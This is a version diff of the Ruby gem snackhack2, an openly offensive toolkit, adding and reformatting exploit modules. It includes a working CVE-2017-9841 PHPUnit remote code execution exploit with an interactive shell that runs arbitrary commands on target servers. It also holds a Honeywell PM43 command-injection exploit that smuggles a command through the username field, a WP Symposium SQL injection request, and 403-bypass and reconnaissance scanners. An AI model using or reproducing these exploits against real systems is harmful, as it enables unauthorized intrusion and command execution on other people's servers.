snackhack2 0.6.4 → 0.6.6

checksums.yaml

@@ -1,7 +1,7 @@
 ---
 SHA256:
-  metadata.gz: b44fea8c993ba9a8b7e92843709b1eb1a59580cf5dcc20096ad94b4c41adbda4
-  data.tar.gz: 775b9eb6964f2b830b9e01ce1e0cd3c37349c16a4a1569e803f4b24252972315
+  metadata.gz: b016f87e2b46dc87ffab71256f1b5880f3db8b1bf16ccbc35bbe7aeeb0e7fe26
+  data.tar.gz: 1a9accfc1fe6f09c5d3e5f624eeeb032441f0fac9a25523c0b08f8b34c9963da
 SHA512:
-  metadata.gz: f7c39179c33fb0f81e330c76283d78af4b6717d8f4cd3d8f66d1884fedaa79f7860638e5a7cfdb968447ba1649d4a61d3dc20266fd9036609882596e69a1cb9b
-  data.tar.gz: f5cd16fcd0e0d29db2f3ca8f9dba20474112c216a4433379e103193f72469ecdca10f0cfd78d9b7db5eeb760701d399935702aaec6728356f7f1373a2525f7af
+  metadata.gz: ce184f5769d385950ebc9a5824f4788398cf301544eacc0dd59a7b2bd64e100f0b4816db9807e307287e8ef89085d18168a575f9b620177dd3bdac53916bcf49
+  data.tar.gz: 82efd660a7495c292a45c527cc9e937e73b143c00fb8e36800be34544c9447f3864f07f1d137d351ab2acd70aa126f8d2ace81080acd79cfcbba61a1b6350a54

data/lib/snackhack2/CVE-2017-9841.rb

@@ -0,0 +1,77 @@
+# frozen_string_literal: true
+require 'net/http'
+require 'uri'
+module Snackhack2
+  class CVE20179841
+    attr_accessor :ip
+
+    def initialize(site, payload: "<?php echo md5('phpunit_rce'); ?>")
+      @site = site
+      @payload = payload
+      @vulnerable = false
+    end
+
+    def run
+
+      paths = ["yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
+        "vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
+        "laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
+        "laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
+        "lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
+        "zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"]
+      paths.each do |path|
+      
+        uri = URI.parse(File.join(@site, path))
+        request = Net::HTTP::Post.new(uri)
+        request.body = "#{@payload}"
+
+        req_options = {
+          use_ssl: uri.scheme == "https",
+        }
+        response = Net::HTTP.start(uri.hostname, uri.port, req_options) do |http|
+          http.request(request)
+        end
+        # this is the MD5 Hhash of "phpunit_rce"
+        if response.body.match("6dd70f16549456495373a337e6708865")
+            @vulnerable = true
+            puts "THIS SITE IS vulnerable!"
+            return path
+        else
+          puts "The site is not vulnerable.... #{File.join(@site, path)}"
+        end
+
+      end
+    end
+    def shell
+      # if vulnerable it passes the path
+      path = self.run
+      # makes sure the site is vulnerable if it 
+      # is it will run a endless while loop
+      if @vulnerable
+        while true
+            # takes input to run on the server
+          
+            print(">")
+            input = gets.chomp
+            if input.eql?("exit")
+              exit
+            else
+              uri = URI.parse(File.join(@site, path))
+              request = Net::HTTP::Post.new(uri)
+              # takes the input ad run it on the host
+              request.body = "<?php system('#{input}'); ?>"
+
+              req_options = {
+                use_ssl: uri.scheme == "https",
+              }
+
+              response = Net::HTTP.start(uri.hostname, uri.port, req_options) do |http|
+                http.request(request)
+              end
+              puts response.body
+            end
+        end
+      end 
+    end
+  end
+end

data/lib/snackhack2/Honeywell_PM43.rb

@@ -1,27 +1,25 @@
-require 'httparty'
-module Snackhack2
-  class HoneywellPM43
-    # CVE-2023-3710
-    # Source: https://www.exploit-db.com/exploits/51885
-    attr_reader :command
-
-    def initialize(site, command: "ls", save_file: true)
-      @site = site
-      @command = command
-    end
-
-    def command=(c)
-      @command = c
-    end
-
-    def run
-      pp = HTTParty.post(File.join(@site, "loadfile.lp?pageid=Configure"),
-                         body: "username=x%0a#{@command}%0a&userpassword=1")
-      if pp.code == 200
-        puts pp
-      else
-        puts "[+] Status Code: #{pp.code}"
-      end
-    end
-  end
-end
+# frozen_string_literal: true
+
+require 'httparty'
+module Snackhack2
+  class HoneywellPM43
+    # CVE-2023-3710
+    # Source: https://www.exploit-db.com/exploits/51885
+    attr_accessor :command
+
+    def initialize(site, command: 'ls', save_file: true)
+      @site = site
+      @command = command
+    end
+
+    def run
+      pp = HTTParty.post(File.join(@site, 'loadfile.lp?pageid=Configure'),
+                         body: "username=x%0a#{@command}%0a&userpassword=1")
+      if pp.code == 200
+        puts pp
+      else
+        puts "[+] Status Code: #{pp.code}"
+      end
+    end
+  end
+end

data/lib/snackhack2/WP_Symposium.rb

@@ -1,22 +1,22 @@
-# frozen_string_literal: true
-
-module Snackhack2
-  class WPSymposium
-    # SOURCE: https://github.com/prok3z/Wordpress-Exploits/tree/main/CVE-2015-6522
-    # https://www.exploit-db.com/exploits/37824
-    # Reveal the MySQL version
-    def initialize(site)
-      @site = site
-    end
-
-    def run
-      wp = Snackhack2::get(File.join(@site,
-                                     '/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--'))
-      if wp.code == 200
-        puts wp.body
-      else
-        puts "[+] HTTP Code: #{wp.code}"
-      end
-    end
-  end
-end
+# frozen_string_literal: true
+
+module Snackhack2
+  class WPSymposium
+    # SOURCE: https://github.com/prok3z/Wordpress-Exploits/tree/main/CVE-2015-6522
+    # https://www.exploit-db.com/exploits/37824
+    # Reveal the MySQL version
+    def initialize(site)
+      @site = site
+    end
+
+    def run
+      wp = Snackhack2.get(File.join(@site,
+                                    '/wp-content/plugins/wp-symposium/get_album_item.php?size=version%28%29%20;%20--'))
+      if wp.code == 200
+        puts wp.body
+      else
+        puts "[+] HTTP Code: #{wp.code}"
+      end
+    end
+  end
+end

data/lib/snackhack2/bannergrabber.rb

@@ -1,82 +1,154 @@
-# frozen_string_literal: true
-
-require 'socket'
-module Snackhack2
-  class BannerGrabber
-    attr_accessor :site, :save_file
-
-    def initialize(site, port: 443, save_file: true)
-      @site    = site
-      @port    = port
-      @headers = Snackhack2::get(@site).headers
-      @save_file = save_file
-    end
-
-    def site
-      #@site.gsub('https://', '')
-    end
-
-    def run
-      nginx
-      apache2
-      wordpress
-      headers
-    end
-
-    def nginx
-      if @headers['server'].match(/nginx/)
-        puts "[+] Server is running NGINX... Now checking if #{File.join(@site, "nginx_status")} is valid..."
-        nginx = Snackhack2::get(File.join(@site, "nginx_status"))
-        if nginx.code == 200
-          puts "Check #{@site}/nginx_status"
-        else
-          puts "Response code: #{nginx.code}"
-        end
-      end
-    end
-
-    def curl
-      servers = ''
-      cmd = `curl -s -I #{@site.gsub('https://', '')}`
-      version = cmd.split('Server: ')[1].split("\n")[0].strip
-      if @save_file
-        servers += version.to_s
-      else
-        puts "Banner: #{cmd.split('Server: ')[1].split("\n")[0]}"
-      end
-      Snackhack2::file_save(@site, "serverversion", servers) if @save_file
-    end
-
-    def apache2
-      if @headers['server'].match(/Apache/)
-        puts "[+] Server is running Apache2... Now checking #{File.join(@site, "server-status")}..."
-        apache = Snackhack2::get(File.join(@site, "server-status"))
-        if apache.code == 200
-          puts "Check #{@site}/server-status"
-        else
-          puts "[+] Response Code: #{apache.code}...\n\n"
-        end
-      else
-        puts "Apache2 is not found...\n\n"
-      end
-    end
-
-    def wordpress
-      wp = Snackhack2::get(@site).body
-      return unless wp.match(/wp-content/)
-
-      puts "[+] Wordpress found [+]\n\n\n"
-    end
-
-    def headers
-      h = Snackhack2::get(@site).headers
-      puts "[+] Server Version: #{h['server']}..."
-    end
-
-    def server
-      @headers['server']
-    end
-
-    attr_reader :site
-  end
-end
+# frozen_string_literal: true
+
+require 'socket'
+module Snackhack2
+  class BannerGrabber
+    attr_accessor :port, :site, :save_file
+
+    def initialize(port: 443, save_file: true)
+      @site    = site
+      @port    = port
+      @save_file = save_file
+    end
+
+    def run
+      nginx
+      apache2
+      wordpress
+    end
+    def headers
+      @headers = Snackhack2.get(@site).headers
+    end
+    def nginx
+      puts "[+] Server is running NGINX... Now checking if #{File.join(@site, 'nginx_status')} is valid..."
+      nginx = Snackhack2.get(File.join(@site, 'nginx_status'))
+      if nginx.code == 200
+        puts "Check #{@site}/nginx_status"
+      else
+        puts "Response code: #{nginx.code}"
+      end
+    end
+
+    def curl
+      servers = ''
+      # rus the curl command to get the headers of the given site. 
+      cmd = `curl -s -I #{@site.gsub('https://', '')}`
+      # extracts the server header from the curl results
+      version = cmd.split('Server: ')[1].split("\n")[0].strip
+      if @save_file
+        servers += version.to_s
+      else
+        puts "Banner: #{cmd.split('Server: ')[1].split("\n")[0]}"
+      end
+
+      # saves the results if '@save_file' is set to true.
+      Snackhack2.file_save(@site, 'serverversion', servers) if @save_file
+    end
+
+    def apache2
+      if headers['server'].match(/Apache/)
+        puts "[+] Server is running Apache2... Now checking #{File.join(@site, 'server-status')}..."
+        apache = Snackhack2.get(File.join(@site, 'server-status'))
+        # status code 200 means the request was successful.
+        if apache.code == 200
+          puts "Check #{@site}/server-status"
+        else
+          puts "[+] Response Code: #{apache.code}...\n\n"
+        end
+      else
+        puts "Apache2 is not found...\n\n"
+      end
+    end
+
+    def wordpress
+      wp = Snackhack2.get(@site).body
+      return unless wp.match(/wp-content/)
+
+      puts "[+] Wordpress found [+]\n\n\n"
+    end
+    def types
+      {
+        "cloudflare": [ "cf-cache-status", "cf-ray", "cloudflare"],
+        "aws CloudFront": [ "X-Amz-Cf-Pop", "X-Amz-Cf-Id", "CloudFront", "x-amz-cf-pop", "x-amz-cf-id", "cloudfront.net"] 
+      }
+    end
+    def find_headers
+      # make a request to the site and grab the headers. 
+      Snackhack2.get(@site).headers
+    end
+    def cloudflare(print_status: true)
+      # the purpose of this method is to 
+      # check to see if a site has 
+      # cloudflare in the headers
+
+      cf_status = false
+      cf_count  = 0
+
+      # access the 'types' hash to get the cloudflare strings. 
+      cf = types[:"cloudflare"]
+
+      # make a single get request to the site defined at '@site'
+      find_headers.each do |k,v|
+        # if the key is in the array cf
+        if cf.include?(k)
+          cf_status = true
+          cf_count += 1
+        end
+      end
+      if print_status
+        # cf_status[0] : the status if cloudflare was found
+        # cf_count[1]  : the number of found elements in the 'cloudflare' hash. 
+        return [cf_status, cf_count]
+      else
+        if cf_status
+          puts "Cloudflare was found. The count is: #{cf_count}"
+        else
+          puts "Cloudflare was NOT found. The count is #{cf_count}"
+        end
+      end
+    end
+    def detect_header(return_status: true)
+      # stores the data found in 
+      # the headers.
+      data = {}
+      # loops through the hash stored in the 'types' method.
+      # the t_k is the KEY of the hash
+      # the t_v is the VALUE of the hash.
+      types.each do |t_k, t_v|
+        # make a single get request to the site 
+        # to get the headers.
+        find_headers.each do |fh_k, fh_v|
+          # Get the keys from the 'types' method
+          # which is basicly a hash
+          type_key = t_k
+          # uses the key of the 'types' hash 
+          # to see if includes the string found in 'fh_k'
+          if types[type_key].include?(fh_k)
+            if data.has_key?(type_key)
+              data[type_key] <<  fh_k
+            else
+              data[type_key] = [fh_k]
+            end
+          end
+        end
+      end
+      if return_status
+        return data
+      else
+        data.each do |k,v|
+          puts "K:#{k}"
+          puts "V: #{v}"
+        end
+      end
+    end
+    def server
+      @headers['server']
+    end
+
+    attr_reader :site
+    private :find_headers
+  end  
+end
+# to do: instead of doing mutiple methods for each type of
+# header make one method that is dynamic...
+# and can do different ones

data/lib/snackhack2/bypass_403.rb

@@ -1,66 +1,68 @@
-require 'async'
-require 'httparty'
-module Snackhack2
-  class BypassHTTP
-    attr_accessor :site, :wordlist, :bypass
-
-    def initialize
-      @site     = site
-      @wordlist = File.join(__dir__, 'lists', 'directory-list-2.3-big.txt')
-      @bypass   = "//"
-    end
-
-    def forward_for
-      File.readlines(@wordlist).each do |r|
-        r = r.strip
-        Async do
-          url = File.join(@site, @bypass, r)
-          r = HTTParty.get(url, :headers => {
-                             "X-Forwarded-For": "127.0.0.1"
-                           })
-          puts url
-          puts r.code
-          puts "\n"
-        end
-      end
-    end
-
-    def web_request(bypass)
-      File.readlines(@wordlist).each do |r|
-        r = r.strip
-        Async do
-          url = File.join(@site, bypass, r)
-          r = Snackhack2::get(url)
-          puts url
-          puts r.code
-          puts "\n"
-        end
-      end
-    end
-
-    def basic
-      web_request("//")
-    end
-
-    def uppercase
-      File.readlines(@wordlist).each do |r|
-        r = r.strip.gsub(/./) { |s| s.send(%i[upcase downcase].sample) }
-        Async do
-          url = File.join(@site, r)
-          puts url
-          r = Snackhack2::get(url)
-          puts r.code
-          puts "\n"
-        end
-      end
-    end
-
-    def url_encode
-      web_request("%2e")
-    end
-
-    def dots
-      web_request("..;/")
-    end
-  end
-end
+# frozen_string_literal: true
+
+require 'async'
+require 'httparty'
+module Snackhack2
+  class BypassHTTP
+    attr_accessor :site, :wordlist, :bypass
+
+    def initialize
+      @site     = site
+      @wordlist = File.join(__dir__, 'lists', 'directory-list-2.3-big.txt')
+      @bypass   = '//'
+    end
+
+    def forward_for
+      File.readlines(@wordlist).each do |r|
+        r = r.strip
+        Async do
+          url = File.join(@site, @bypass, r)
+          r = HTTParty.get(url, headers: {
+                             "X-Forwarded-For": '127.0.0.1'
+                           })
+          puts url
+          puts r.code
+          puts "\n"
+        end
+      end
+    end
+
+    def web_request(bypass)
+      File.readlines(@wordlist).each do |r|
+        r = r.strip
+        Async do
+          url = File.join(@site, bypass, r)
+          r = Snackhack2.get(url)
+          puts url
+          puts r.code
+          puts "\n"
+        end
+      end
+    end
+
+    def basic
+      web_request('//')
+    end
+
+    def uppercase
+      File.readlines(@wordlist).each do |r|
+        r = r.strip.gsub(/./) { |s| s.send(%i[upcase downcase].sample) }
+        Async do
+          url = File.join(@site, r)
+          puts url
+          r = Snackhack2.get(url)
+          puts r.code
+          puts "\n"
+        end
+      end
+    end
+
+    def url_encode
+      web_request('%2e')
+    end
+
+    def dots
+      web_request('..;/')
+    end
+  end
+end

data/lib/snackhack2/comments.rb

@@ -1,27 +1,29 @@
-module Snackhack2
-  class Comments
-    attr_accessor :site
-
-    def initialize
-      @site = site
-    end
-
-    def run
-      c = Snackhack2::get(@site)
-
-      if c.code == 200
-        body = c.body.split("\n")
-        body.each_with_index do |l, i|
-          line = l.strip
-          if line.start_with?("<!--")
-            puts body[i].next
-          elsif line.include?("<!")
-            puts body[i].next
-          end
-        end
-      else
-        puts "Status Code: #{c.code}\n"
-      end
-    end
-  end
-end
+# frozen_string_literal: true
+
+module Snackhack2
+  class Comments
+    attr_accessor :site
+
+    def initialize
+      @site = site
+    end
+
+    def run
+      c = Snackhack2.get(@site)
+
+      if c.code == 200
+        body = c.body.split("\n")
+        body.each_with_index do |l, i|
+          line = l.strip
+          if line.start_with?('<!--')
+            puts body[i].next
+          elsif line.include?('<!')
+            puts body[i].next
+          end
+        end
+      else
+        puts "Status Code: #{c.code}\n"
+      end
+    end
+  end
+end